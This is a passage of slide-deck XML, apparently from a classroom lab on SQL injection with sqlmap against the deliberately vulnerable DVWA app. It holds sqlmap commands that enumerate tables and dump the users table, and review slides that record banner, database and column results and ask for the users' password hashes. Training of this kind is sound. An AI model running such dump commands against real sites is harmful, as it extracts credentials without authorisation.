                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Tables = sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low" --tables</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Columns of the users table =  sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low" --current-db dvwa --dump</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; cat users.csv</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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5" name="Shape 1505"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1506" name="Google Shape;1506;p11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sqlmap Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1507" name="Google Shape;1507;p11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Record the results of your information gathering: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1508" name="Google Shape;1508;p11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509" name="Google Shape;1509;p115"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="774325" y="1303325"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{53CCE35E-85F1-4C2B-8E29-DD4EB081A20E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3865525"/>
                <a:gridCol w="3865525"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Banner</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FD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>web server operating system: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>Linux Debian</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFD966"/>
                        </a:solidFill>
                        <a:latin typeface="Inconsolata"/>
                        <a:ea typeface="Inconsolata"/>
                        <a:cs typeface="Inconsolata"/>
                        <a:sym typeface="Inconsolata"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>web application technology: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>Apache 2.4.25</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFD966"/>
                        </a:solidFill>
                        <a:latin typeface="Inconsolata"/>
                        <a:ea typeface="Inconsolata"/>
                        <a:cs typeface="Inconsolata"/>
                        <a:sym typeface="Inconsolata"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>back-end DBMS: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>MySQL &gt;= 5.0</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFD966"/>
                        </a:solidFill>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r>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Databases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800"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>dvwa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>infromation_schema</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFD966"/>
                        </a:solidFill>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r>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Tables in DVWA</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800"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>guestbook</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>user</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFD966"/>
                        </a:solidFill>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r>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Columns in users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solidFill>
                            <a:srgbClr val="FFD966"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>user_id, avatar, user, password, last_name, first_name, and last_login.</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFD966"/>
                        </a:solidFill>
                        <a:latin typeface="Inconsolata"/>
                        <a:ea typeface="Inconsolata"/>
                        <a:cs typeface="Inconsolata"/>
                        <a:sym typeface="Inconsolata"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="800"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="FFD966"/>
                        </a:solidFill>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3" name="Shape 1513"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1514" name="Google Shape;1514;p11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sqlmap Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1515" name="Google Shape;1515;p11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Record the results of your information gathering: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1516" name="Google Shape;1516;p11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517" name="Google Shape;1517;p116"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="774325" y="1303325"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{53CCE35E-85F1-4C2B-8E29-DD4EB081A20E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3865525"/>
                <a:gridCol w="3865525"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Banner</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24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>web server operating system: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>Linux Debian</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="24292E"/>
                        </a:solidFill>
                        <a:latin typeface="Inconsolata"/>
                        <a:ea typeface="Inconsolata"/>
                        <a:cs typeface="Inconsolata"/>
                        <a:sym typeface="Inconsolata"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>web application technology: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>Apache 2.4.25</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="24292E"/>
                        </a:solidFill>
                        <a:latin typeface="Inconsolata"/>
                        <a:ea typeface="Inconsolata"/>
                        <a:cs typeface="Inconsolata"/>
                        <a:sym typeface="Inconsolata"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>back-end DBMS: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>MySQL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="D73A49"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>= 5.0</a:t>
                      </a:r>
                      <a:endParaRPr b="1">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r>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Databases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800"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>dvwa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>infromation_schema</a:t>
                      </a:r>
                      <a:endParaRPr b="1">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r>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Tables in DVWA</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800"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>guestbook</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>user</a:t>
                      </a:r>
                      <a:endParaRPr b="1">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r>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Columns in users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a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Inconsolata"/>
                          <a:ea typeface="Inconsolata"/>
                          <a:cs typeface="Inconsolata"/>
                          <a:sym typeface="Inconsolata"/>
                        </a:rPr>
                        <a:t>user_id, avatar, user, password, last_name, first_name, and last_login.</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Inconsolata"/>
                        <a:ea typeface="Inconsolata"/>
                        <a:cs typeface="Inconsolata"/>
                        <a:sym typeface="Inconsolata"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="800"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr>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1" name="Shape 1521"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1522" name="Google Shape;1522;p11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sqlmap Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1523" name="Google Shape;1523;p11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How many users are registered on this site? What are their username/password hashes? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1524" name="Google Shape;1524;p11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25" name="Google Shape;1525;p117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1445025"/>
            <a:ext cx="9144000" cy="1534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solidFill>
